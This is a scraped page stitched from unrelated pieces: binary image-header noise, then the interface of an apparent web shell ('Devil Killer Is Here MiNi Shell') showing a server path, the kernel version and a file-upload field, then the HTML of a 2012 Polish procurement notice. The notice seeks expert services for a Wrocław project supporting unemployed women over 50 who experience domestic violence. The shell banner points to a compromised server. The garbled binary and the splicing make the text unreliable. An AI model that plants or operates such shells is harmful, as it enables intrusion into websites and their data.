JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120829/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120829/320934-N-2012.html

<p class="kh_header"><b>Wrocław: Świadczenie usługi eksperta w projekcie
Model wsparcia jako innowacyjne narzędzie wzmacniające współpracę publicznych i niepublicznych instytucji pomocy społecznej oraz przedsiębiorców dedykowane gminnym zespołom interdyscyplinarnym realizowanym przez Centrum Integracji Społecznej w ramach Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 320934 - 2012; data zamieszczenia: 29.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Integracji Społecznej , ul. Strzegomska 49, 53-611 Wrocław, woj. dolnośląskie, tel. 71 782 35 11, faks 71 782 35 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cis.wroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi eksperta w projekcie
Model wsparcia jako innowacyjne narzędzie wzmacniające współpracę publicznych i niepublicznych instytucji pomocy społecznej oraz przedsiębiorców dedykowane gminnym zespołom interdyscyplinarnym realizowanym przez Centrum Integracji Społecznej w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi eksperckie w ramach Projektu Model Wsparcia jako innowacyjne narzędzie wzmacniające współpracę publicznych i niepublicznych instytucji pomocy społecznej oraz przedsiębiorców dedykowane gminnym zespołom interdyscyplinarnym służącego wejściu na rynek pracy niezatrudnionych kobiet w wieku 50+ doświadczających przemocy domowej. Ekspert - przedstawiciel Centrum Integracji Społecznej lub Klubu Integracji Społecznej - Zgodnie z ustawą o zatrudnieniu socjalnym.Udział ekspertów jest niezbędny do prawidłowej realizacji projektu innowacyjnego i wymagany przez PO KL. Ich obecność w projekcie jest niezbędna do skonfrontowania potrzeb użytkowników i proponowanego w ramach projektu rozwiązania.
Projekt ma charakter innowacyjno-testujący i jest  współfinansowany ze środków Unii Europejskiej w  ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, Priorytetu I Zatrudnienie i Integracja Społeczna, Działanie 1.2 Wspieranie systemowe instytucji pomocy i integracji społecznej.

TŁO ZAMÓWIENIA:

Charakterystyka Projektu:
Innowacyjny, przygotowany w partnerstwie projekt umożliwi przygotowanie i przetestowanie metod skutecznej pracy z niezatrudnionymi kobietami po 50r.ż., które doświadczają przemocy w środowisku domowym. Dotychczas nie podjęto się przygotowania skutecznych i zindywidualizowanych narzędzi pracy na potrzeby instytucji systemu zapobiegania przemocy w środowisku dom. W 2010r. znowelizowana Ustawa o przeciwdziałaniu przemocy w rodzinie nałożyła na każdą gminę obowiązek tworzenia systemu przeciwdziałania przemocy. Nowelizacja zobowiązała do stałej współpracy podmioty, które działały do tej pory w pojedynkę, powielając często swoje działania, skutkiem czego kobieta doświadczająca przemocy nie otrzymywała kompleksowego wsparcia dopasowanego do jej potrzeb.
Niezbędnym ogniwem nowego systemu jest praca Zespołów Interdyscyplinarnych (ZI), które powinny integrować i koordynować działania m. in. jednostek pomocy społ., Komisji Rozwiązywania Problemów Alkoholowych (KRPA), Policji, oświaty, ochrony zdrowia i NGO, które specjalizują się w świadczeniu pomocy. Wg danych Instytutu Spraw Publicznych, w XI 2011r. jedynie w 50% gmin ZI podjęły działania skoncentrowane na: ustalaniu regulaminu działania, szacowaniu zasobów służących świadczeniu pomocy oraz opracowaniu procedur w sytuacji zgłoszenia Niebieskich Kart . PARPA w Rekomendacjach do pracy na 2012r. stwierdza, że problemem jest niska efektywność instytucjonalnego systemu pomocy oraz narastające zjawisko przemocy wobec kobiet. Doświadczenia Gm. Wrocław wskazują, że członkowie ZI są na etapie sprawdzania skuteczności działań oraz poszukiwania efektywnych metod realizacji Indywidualnych Planów Pomocy. Nawet w gminach o rozwiniętym systemie usług socjalnych brak dostępu do narzędzi nie pozwala dostosować dostępnej pomocy do specyfiki szkód doświadczanych przez ofiary. Częstym sposobem wspierania osób doświadczających przemocy jest oferowanie pomocy prawnej, psychologicznej oraz schronienia (OBOP 2010r.-Zjawisko przemocy w rodzinie wobec kobiet i mężczyzn). Zapisy ustawy nakładają obowiązek informowania ofiary o możliwości uzyskania pomocy i wskazaniu miejsca jej świadczenia. Ofiara przemocy musiałaby jednak być trwale zmotywowana do zmiany swojej sytuacji, wykazywać dostateczną aktywność i determinację w korzystaniu z zasobów instytucji. Tymczasem wyniki badań dot. Zespołu Stresu Pourazowego (PTSD), wskazują że ofiara przemocy, doświadczająca wstydu, upokorzenia, izolacji społ., wykazuje cechy SYNDROMU WYUCZONEJ BEZRADNOŚCI, co często uniemożliwia jej samodzielne korzystanie z rekomendowanych miejsc pomocy. Skuteczna pomoc ze strony  ZI  jest jeszcze trudniejsza, gdy przemocy doświadczają kobiety niezatrudnione, uzależnione ekonomicznie od agresora.
Przemocy domowej nadal doświadcza w Polsce znacznie więcej kobiet niż mężczyzn  (Niebieska Linia 2010- 80% kobiet zgłaszających przemoc i 20% mężczyzn). Z danych instytucji pomocy społ. wynika że 50% kobiet korzystających z pomocy doświadcza przemocy domowej (Magdalena Goetz Ekonomia ma płeć. O dyskryminacji i przemocy ekonomicznej wobec kobiet). Ze statystyk wrocławskiego ZI wynika, że zgłaszane jako ofiary przemocy kobiety stanowią 90%.
Dane na temat przemocy wobec kobiet, zawarte w publikacji Wybieram Zycie (2008r.) wskazują, ze przemocy doświadcza 26%kobiet w Polsce. Wzrasta grupa kobiet po 50r.ż., które doświadczają przemocy. Przemoc występuje dwukrotnie częściej w rodzinach, w których kobieta nie pracuje. W 2010r. ofiary przemocy domowej zgłaszały telefonicznie w Niebieskiej Linii, że są ofiarami przemocy psychicznej (87%), fizycznej(57%), ekonomicznej(24%), seksualnej (6%). Wg danych statystycznych Niebieskiej Linii od kilku lat narasta problem przemocy ekonomicznej wobec członków rodziny (2007-15%, 2008-17%, 2009-21%, 2010r.-24% zgłoszeń), szczególnie wobec kobiet. PARPA w Rekomendacjach do pracy na 2012 r. postuluje by wypracowywać skuteczne i zindywidualizowane metody pracy w ramach Niebieskiej Karty, a priorytetem powinno być zapewnienie stałej, pełnej oferty pomocy kobietom krzywdzonym przez najbliższych. Wg statystyk PARPA problem szczególnie dotyka kobiet uzależnionych  ekonom. od sprawcy.
Wg danych Miejskiego Ośrodka Pomocy Społecznej we Wrocławiu wzrasta liczba kobiet po 50r. ż. zgłaszanych do ZI. Blisko 20%  (77 osób z 396) ze zgłoszonych w 2011r. to kobiety po 50r.ż. 35% tych kobiet nie pracuje. Z danych KRPA we W-wiu wynika, że w przeszło 30% rodzin zgłoszonych ofiarą przemocy jest kobieta po 50r. ż. Kobiety te nie posiadają  środków, by  dojechać do miejsc świadczonej  pomocy. Działalność ZI będzie nieskuteczna, bez zastosowania innego, innowacyjnego modelu wsparcia, który uwzględnia lokalne możliwości instytucji. wsparcia ofiar przemocy, przy uwzględnieniu psychofizycznych. możliwości nie pracujących kobiet po 50 r. ż., ekonomicznie uzależnionych od sprawcy.

Wypracowanie MODELU WSPARCIA niezatrudnionych kobiet w wieku 50+, doświadczających przemocy domowej (nK50+dp) będzie oczekiwanym przez ZI narzędziem aktywizacji społ. i zaw., zwiększającym szanse na skuteczne wyswobodzenie się z sytuacji przemocowej.
Pomoc oferowana każdej kobiecie będzie szyta na miarę jej ograniczeń i zasobów. Proponowane rozwiązanie problemu z dostępem do oczekiwanych zestandaryzowanych narzędzi pracy użytkowników (ZI) oraz grup odbiorców (kobiet) wypracowane będzie w partnerstwie podmiotów działających w obszarze zatrudnienia oraz integracji społecznej (Centrum Integracji Społecznej oraz Fundacja Centrum Praw Kobiet)  z partnerem przedsiębiorcą wybranym w trakcie realizacji projektu.  Zastosowanie wypracowanego MODELU WSPARCIA nK50+dp, umożliwi rozwiązanie problemów i wejście na rynek pracy  grupie zagrożonych wykluczeniem społ. co zgodne jest z tematem dla projektów innowacyjnych testujących. Realizacja projektu, usamodzielnienie ekonomiczne kobiet, wpłynie pozytywnie na funkcjonowanie rodzin, w których występuje przemoc. Kobiety uczestniczące w projekcie pozytywnie zamodelują możliwości radzenie sobie w bardzo trudnej sytuacji, co zaktywizuje inne osoby doznające przemocy w rodzinie.
Zastosowanie Modelu Wsparcia jako skutecznego narzędzia aktywizacji społecznej i zawodowej uzupełni katalog metod stosowanych przez jednostki pomocy społecznej i NGO, których odbiorcami są grupy osób zagrożonych wykluczeniem społecznym.
Cele Projektu:
Cel główny projektu
Poszerzenie katalogu narzędzi stosowanych przez zespoły interdyscyplinarne (ZI) w ramach wzmocnienia współpracy publicznych i niepublicznych instytucji pomocy społecznej oraz przedsiębiorców o Model Wsparcia (MW) służący  wejściu na rynek pracy niezatrudnionych kobiet w wieku 50+ doświadczających przemocy domowej (nK50+dp), w okresie VIII 2012 - III 2015.
Cele szczegółowe
1.	Pogłębienie wiedzy na temat dotychczasowego funkcjonowania gminnych ZI w Polsce w zakresie wspierania nK50+dp w okresie VIII 2012 - III 2013.
2.	Przetestowanie wypracowanego w partnerstwie trójsektorowym Modelu Wsparcia (MW)  nK50+dp w okresie VI 2013 - III 2014 w gminie Wrocław.
3.	Upowszechnienie finalnego produktu MW wśród użytkowników (zespołów interdyscyplinarnych, centrów integracji społecznej klubów integracji społecznej, ośrodków pomocy społecznej, NGO, przedsiębiorcy) i włączenie w główny nurt polityki w okresie VI 2013 - III 2015.

Zakładane rezultaty realizacji projektu

1 Model Wsparcia (forma: Przewodnik po Modelu Wsparcia) obejmujący: m.in. procedurę rekrutacji Koordynatorów wsparcia w ramach publicznych i niepublicznych instytucji pomocy społecznej, program szkolenia Koordynatorów wsparcia, zasady współpracy Koordynatorów wsparcia z zespołami interdyscyplinarnymi, instytucjami pomocy społecznej (ips), NGO oraz przedsiębiorcami, wzór karty-skierowania niezatrudnionych kobiet w wieku 50+ doświadczających przemocy domowej (nK50+dp) przez zespoły interdyscyplinarne do współpracy z Koordynatorami wsparcia, formularz PROGRAMU ZMIANY wraz ze zbiorem wytycznych dotyczących metod wspierania przez Koordynatorów wsparcia niezatrudnionych kobiet w wieku 50+ doświadczających przemocy domowej, program szkolenia nK50+dp, praktyki u przedsiębiorców monitorowane przez Koordynatora wsparcia.
PRZEDMIOT UPOWSZECHNIANIA: Model Wsparcia jako narzędzie aktywizacji nK50+dp.
Liczba objętych badaniami gminnych zespołów interdyscyplinarnych: 63
Liczba zanalizowanych Indywidualnych Planów Pomocy: 126
Liczba raportów końcowych: 1
Liczba kobiet (nK50+dp ) objętych wsparciem w ramach testowanego Modelu Wsparcia: 15
Liczba osób przeszkolonych na Koordynatorów Wsparcia :10 (8K, 2M)
Liczba osób wyłonionych na Koordynatorów Wsparcia do testowania Modelu Wsparcia: 3 (2 kobiety, 1 mężczyzna).

ZADANIA I ORGANIZACJA PRACY EKSPERTÓW:

1.	Wyłonieni eksperci (łącznie 4 osoby) wraz z Kierownikiem projektu oraz dwoma Koordynatorami Partnerów (1 Partner- Fundacja Centrum Praw Kobiet, 1 Partner-Przedsiębiorca) wchodzić będą w skład Komitetu Sterującego. Zadaniem Komitetu Sterującego jest  opiniowanie  danych pozyskanych w toku badań przez Zespół Badawczo-Monitorujący  oraz opracowanie  oczekiwanego produktu finalnego Projektu, tj. Modelu Wsparcia, przy współpracy z Zespołem Badawczo-Monitorującym. 4 Eksperci mają reprezentować 4 grupy użytkowników Modelu Wsparcia tzn. zespoły interdyscyplinarne, organizacje pozarządowe zajmujące się pomocą społeczną, zwłaszcza w obszarze przemocy wobec kobiet,  ośrodki pomocy społecznej oraz podmioty zajmujące się reintegracją społeczno-zawodowa tj. centra kluby integracji społecznej.

2.	Komitet Sterujący spotyka się raz na tydzień (średnio po 5 godzin tj. 20 godzin-m-c.) w siedzibie Zamawiającego. Poniżej zestawienie zadań do realizacji przez 4  Ekspertów ściśle współpracujących z pozostałymi członkami Komitetu Sterującego,  w podziale na poszczególne etapy Projektu.  

ETAP PRZYGOTOWANIA
podczas regularnych spotkań Komitetu Sterującego Eksperci uczestniczą w wymianie informacji i bieżącym opiniowaniu danych pozyskiwanych przez Zespół Badawczo-Monitorujacy. Eksperci na etapie przygotowania zaopiniują metodę badawczą, narzędzia badawcze oraz dane  pozyskane m.in. w toku badań terenowych (badanie 63 zespołów interdyscyplinarnych oraz 126 klientek tychże zespołów, odpowiadającej kryteriom  grupy docelowej odbiorczyń Modelu Wsparcia, z terenu Polski).
Eksperci na bieżąco uczestniczą w procesie konceptualizacji oczekiwanego produktu finalnego Projektu, tj. Modelu Wsparcia. 
Na potrzeby opracowania Modelu Wsparcia, eksperci dokonają niezbędnych analiz, ekspertyz, rekomendacji w ramach dziedziny/grupy Użytkowników, którą reprezentują. 
Pod koniec etapu przygotowania Komitet Sterujący opracuje  wstępną wersję Modelu Wsparcia w oparciu o wyniki własnej pracy eksperckiej  oraz z uwzględnieniem danych przekazanych przez  Zespół Badawczo-Monitorujacy w formie Raportu końcowego z badań. 
Komitet Sterujący (w tym 4 eksperci) wezmą udział w 2 spotkaniach z potencjalnymi użytkownikami Modelu Wsparcia celem przedyskutowania koncepcji MW i uzyskania informacji zwrotnej na temat opracowywanego produktu finalnego.
Podczas 6 spotkań Komitet Sterujący (w tym 4 eksperci)  opracuje wstępną wersję Modelu Wsparcia do testowania. 
Eksperci w ramach pracy w Komitecie Sterującym współuczestniczą w opracowaniu Modelu Wsparcia i strategii jego wdrażania, które zostaną przekazane do oceny Instytucji Wdrażającej (Instytucji Pośredniczącej II stopnia).

ETAP TESTOWANIA WDRAŻANEGO MODELU WSPARCIA
Komitet Sterujący (w tym 4 eksperci) nadzoruje pracę Zespołu Badawczo-Monitorującego, prowadzącego Monitoring Testowania (w ramach nadzoru opiniuje narzędzia badawcze oraz skuteczności prowadzonych badań). 
Rezultaty pracy ekspertów będą na bieżąco dokumentowane m.in. na Formularzu opinii testowanego Modelu Wsparcia.
Na etapie testowania wdrażanego Modelu Wsparcia 4 ekspertów z pozostałymi członkami Komitetu Sterującego oraz przy udziale Zespołu Badawczo-Monitorującego odbędą łącznie 20 spotkań z uczestnikami fazy testowania.

ETAP ANALIZY RZECZYWISTYCH EFEKTÓW TESTOWANEGO PRODUKTU
Komitet Sterujący (w tym 4 Ekspertów) nadzoruje pracę i prowadzą konsultacje z  Zespołem Badawczo-Monitorującym podczas opracowywania Oceny skutków stosowania produktu (MW).

ETAP OPRACOWANIA PRODUKTU FINALNEGO
Komitet Sterujący (w tym 4 Ekspertów) współpracuje z Zespołem Badawczo-Monitorującym w zakresie opracowania ostatecznej wersji produktu finalnego (Modelu Wsparcia) w oparciu o zgromadzony i przeanalizowany materiał badawczy, z uwzględnieniem wyników ewaluacji przeprowadzonej przez niezależnego zewnętrznego ewaluatora. Prace nad opracowaniem produktu finalnego realizowane będą podczas 10 sesji roboczych oraz 3 spotkań z przedstawicielami grup docelowych. Gotowy produkt finalny zostanie przedstawiony do walidacji. 
ICZAS REALIZACJI ZAMÓWIENIA ORAZ WYMAGANIA ODNOŚNIE ZAMÓWIENIA
1.	 Zadania leżące w zakresie usług świadczonych przez ekspertów muszą być realizowane zgodnie z aktualnym wnioskiem o dofinansowanie realizacji projektu Model Wsparcia jako innowacyjne narzędzie wzmacniające współpracę publicznych i niepublicznych instytucji pomocy społecznej oraz przedsiębiorców dedykowane gminnym zespołom interdyscyplinarnym.
2.	Zmiany wprowadzane w projekcie wymagają dokonania zmiany wniosku o dofinansowanie, wpływające na istotną zmianę zadań leżących w zakresie usług świadczonych przez ekspertów oraz wymagają zmiany zapisów umowy poprzez wprowadzenie odpowiedniego aneksu.
3.	Zamawiający nie dopuszcza możliwości zlecenia części zadań leżących w zakresie przedmiotu zamówienia innym osobom - podmiotom (podwykonawstwo).
4.	Termin realizacji zamówienia: od momentu podpisania umowy do 31 .X. 2014  r.
5.	Projekt Model Wsparcia jako innowacyjne narzędzie wzmacniające współpracę publicznych i niepublicznych instytucji pomocy społecznej oraz przedsiębiorców dedykowane gminnym zespołom interdyscyplinarnym ma charakter innowacyjno-testujący, co oznacza że po realizacji części badawczej, trwającej przez pierwsze osiem miesięcy (tj. od sierpnia 2012 do marca 2013) złożona zostanie do dwumiesięcznej oceny (w okresie kwiecień-maj 2013) przez Instytucję Wdrażającą (Instytucję Pośredniczącą II stopnia)  strategia wdrażania projektu innowacyjnego. W przypadku akceptacji złożonej strategii i jej rekomendacji projekt będzie kontynuowany przy udziale 3 Ekspertów badań i monitoringu w okresie od czerwca 2013 do czerwca 2014 roku. W przypadku nie uzyskania zgody na dalszą realizację projektu, umowa z ekspertami badań i monitoringu wygaśnie z dniem uzyskania informacji o zaistniałym fakcie, lecz nie później niż z dniem 31.V.2013 r. 
Następnie nastąpi miesięczna przerwa w lipcu 2014 na ewaluację zewnętrzną wypracowanego produktu. Po okresie ewaluacji zewnętrznej 3 ekspertów badań i monitoringu  będzie kontynuowało realizację zadań w okresie sierpień 2014- październik 2014. 
6.Każdy z 4 ekspertów, wypracuje średnio 20 godzin - m-c. Okresy realizacji poszczególnych zadań realizowanych w ramach Projektu przez każdego z 4 ekspertów prezentuje poniższe zestawienie. Nazwa zadania Etap przygotowania, przewidywany Okres realizacji VIII 2012 - III 2013, Liczba m-cy w ramach danego zadania 8 m-cy, Liczba godzin pracy w ramach danego zadania160h Nazwa zadania Przerwa na ocenie złożonej strategii (po ocenie projekt będzie kontynuowany lub jego realizacja zakończy się), przewidywany Okres realizacji IV 2013-V 2013, Liczba m-cy w ramach danego zadania 2 m-ce, Liczba godzin pracy w ramach danego zadania 0h Nazwa zadania Testowanie wdrażanego Modelu Wsparcia, przewidywany Okres realizacji VI 2013 - III 2014 Liczba m-cy w ramach danego zadania 10 m-cy, Liczba godzin pracy w ramach danego zadania 200h Nazwa zadania Analiza rzeczywistych efektów testowanego produktu, przewidywany Okres realizacji IV 2014-VI 2014 Liczba m-cy w ramach danego zadania 3 m-ce, Liczba godzin pracy w ramach danego zadania 60h Nazwa zadania Przerwa na ewaluację zewnętrzną, przewidywany Okres realizacji VII 2014 Liczba m-cy w ramach danego zadania 1 m-c, Liczba godzin pracy w ramach danego zadania 0h Nazwa zadania Opracowanie produktu finalnego, przewidywany Okres realizacji VIII 2014-X 2014 Liczba m-cy w ramach danego zadania 3 m-ce, Liczba godzin pracy w ramach danego zadania 60h Łączna liczba m-cy pracy 1 eksperta: 24 m-ce Łączna maksymalna liczba godzin wypracowanych przez każdego z 4 ekspertów (średnio 20 godzin na każdy m-c pracy): 480h
6.	Zamawiający zastrzega sobie możliwość zmiany powyższego harmonogramu.
7.	W okolicznościach uzasadniających zmianę, możliwe będzie przesuwanie planowanej liczby godzin pracy pomiędzy poszczególnymi latami.
8.	Wykonawca musi zdeklarować gotowość świadczenia usługi eksperta bezpośrednio w miejscu i czasie wskazanym przez Zamawiającego. Spotkania z zespołem projektowym będą realizowane w siedzibie Zamawiającego tj. w Centrum Integracji Społecznej, ul. Strzegomska 49, 53-611 Wrocław.  
9.	Rzeczywiste godziny świadczenia usługi będą przedmiotem bieżących uzgodnień z zespołem projektowym. 
10.	 Obowiązkiem Wykonawcy będzie prowadzenie kart pracy oraz sprawozdania z wykonanych usług, zgodnych z zakresem przedmiotu zamówienia, zawierających dane dotyczące liczby godzin (czasu) faktycznego świadczenia usługi i rodzaju wykonanych prac. Karty pracy i sprawozdania będą podstawą wypłaty wynagrodzenia za świadczone usługi.
11.	 Do obowiązków wykonawcy na zasadach określonych w umowie na świadczenie usług badawczych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.32.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje osobą:
1.	posiadają wykształcenie wyższe,
2.	będącą przedstawicielem Centrum Integracji Społecznej lub Klubu Integracji Społecznej (Zgodnie z ustawą o zatrudnieniu socjalnym),
3.	będącą doradcą zawodowym, 
4.	posiadającą wiedzę ekspercką w zakresie przeciwdziałania skutkom przemocy domowej i/lub aktywizacji zawodowej osób zagrożonych wykluczeniem społecznym.
5.	posiadającą co najmniej 3 letnie doświadczenie w pracy z osobami zagrożonymi wykluczeniem społecznym
6.	posiadającą doświadczenie w doradztwie indywidualnym i/lub grupowym minimum 60 godzin
7.	posiadającą doświadczenie w opracowywaniu Indywidualnych programów działań - minimum 10.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

